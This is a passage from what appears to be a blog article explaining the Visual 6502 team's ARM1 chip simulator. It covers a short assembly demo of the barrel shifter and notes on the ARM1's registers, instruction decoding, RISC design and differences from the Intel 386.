0024  E2822001 add     r2, r2, #1    @ Add 1 to r2
0028  E4830004 str     r0, [r3], #4  @ Write result to memory
002C  EAFFFFFB b       loop          @ Branch to loop

Inside the loop, register r1 (0x000f) is rotated to the right by r2 bit positions and the result is stored in register r0. Then r2 is incremented and the shift result written to memory. As the simulator runs, watch as r2 is incremented and as r0 goes through the various values of 4 bits rotated. The A and D values show the address and data pins as instructions are read from memory.

The changing shift values are clearly visible in the barrel shifter, as the diagonal line shifts position. If you zoom in on the register file, you can read out the values of the registers, as described earlier.

Conclusion

The ARM1 processor led to the amazingly successful ARM processor architecture that powers your smart phone. The simple RISC architecture of the ARM1 makes the circuitry of the processor easy to understand, at least compared to a chip such as the 386.[12] The ARM1 simulator provides a fascinating look at what happens inside a processor, and hopefully this article has helped explain what you see in the simulator.

P.S. If you want to read more about ARM1 internals, see Dave Mugridge’s series of posts:
Inside the armv1 Register Bank
Inside the armv1 Register Bank — register selection
Inside the armv1 Read Bus
Inside the ALU of the armv1 — the first ARM microprocessor

Notes and references

[1] I should make it clear that I am not part of the Visual 6502 team that built the ARM1 simulator. More information on the simulator is in the Visual 6502 team’s blog post The Visual ARM1.

[2] The block diagram below shows the components of the chip in more detail. See the ARM Evaluation System manual for an explanation of each part.

Floorplan of the ARM1 chip, from ARM Evaluation System manual. (Bus labels are corrected from original.)

Floorplan of the ARM1 chip, from ARM Evaluation System manual. (Bus labels are corrected from original.)

[3] You may have noticed that the ARM architecture describes 16 registers, but the chip has 25 physical registers. There are 9 «extra» registers because there are extra copies of some registers for use while handling interrupts.

Another interesting thing about the register file is the PC register is missing a few bits. Since the ARM1 uses 26-bit addresses, the top 6 bits are not used. Because all instructions are aligned on a 32-bit boundary, the bottom two address bits in the PC are always zero. These 8 bits are not only unused, they are omitted from the chip entirely.

[4] The ALU doesn’t support multiplication (added in ARM 2) or division (added in ARMv7).

[5] A bit more detail on the decode circuitry. Instruction decoding is done through three separate PLAs. The ALU decode PLA generates control signals for the ALU based on the four operation bits in the instruction. The shift decode PLA generates control signals for the barrel shifter. The instruction decode PLA performs the overall decoding of the instruction. The register decode block consists of three layers. Each layer takes a 4-bit register id and activates the corresponding register. There are three layers because ARM operations use two registers for inputs and a third register for output.

[6] In a RISC computer, the instruction set is restricted to the most-used instructions, which are optimized for high performance and can typically execute in a single clock cycle. Instructions are a fixed size, simplifying the instruction decoding logic. A RISC processor requires much less circuitry for control and instruction decoding, leaving more space on the chip for registers. Most instructions operate on registers, and only load and store instructions access memory. For more information on RISC vs CISC, see RISC architecture.

[7] For details on the history of the ARM1, see Conversation with Steve Furber: The designer of the ARM chip shares lessons on energy-efficient computing.

[8] The 386 and the ARM1 instruction sets are different in many interesting ways. The 386 has instructions from 1 byte to 15 bytes, while all ARM1 instructions are 32-bits long. The 386 has 15 registers — all with special purposes, while the ARM1 has 25 registers, mostly general-purpose. 386 instructions can usually operate on memory, while ARM1 instructions operate on registers except for load and store. The 386 has about 140 different instructions, compared to a couple dozen in the ARM1 (depending how you count). Take a look at the 386 opcode map to see how complex decoding a 386 instruction is. ARM1 instructions fall into 5 categories and can be simply decoded. (I’m not criticizing the 386’s architecture, just pointing out the major architectural differences.)

See the Intel 80386 Programmer’s Reference Manual and 80386 Hardware Reference Manual for more details on the 386 architecture.

[9] Interestingly the ARM company doesn’t manufacture chips. Instead, the ARM intellectual property is licensed to hundreds of different companies that build chips that use the ARM architecture. See The ARM Diaries: How ARM’s business model works for information on how ARM makes money from licensing the chip to other companies.

[10] The first metal layer in the chip runs largely top-to-bottom, while the second metal layer runs predominantly horizontally. Having two layers of metal makes the layout much simpler than single-layer processors such as the 6502 or Z-80.

[11] In the register file, alternating bits are mirrored to simplify the layout. This allows neighboring bits to share power and ground lines. The ARM1’s register file is triple-ported, so two register can be read and one register written at the same time. This is in contrast to chips such as the 6502 or Z-80, which can only access registers one at a time.

[12] For more information on the ARM1 internals, the book VLSI Risc Architecture and Organization by ARM chip designer Steven Furber has a hundred pages of information on the ARM chip internals. An interesting slide deck is A Brief History of ARM by Lee Smith, ARM Fellow.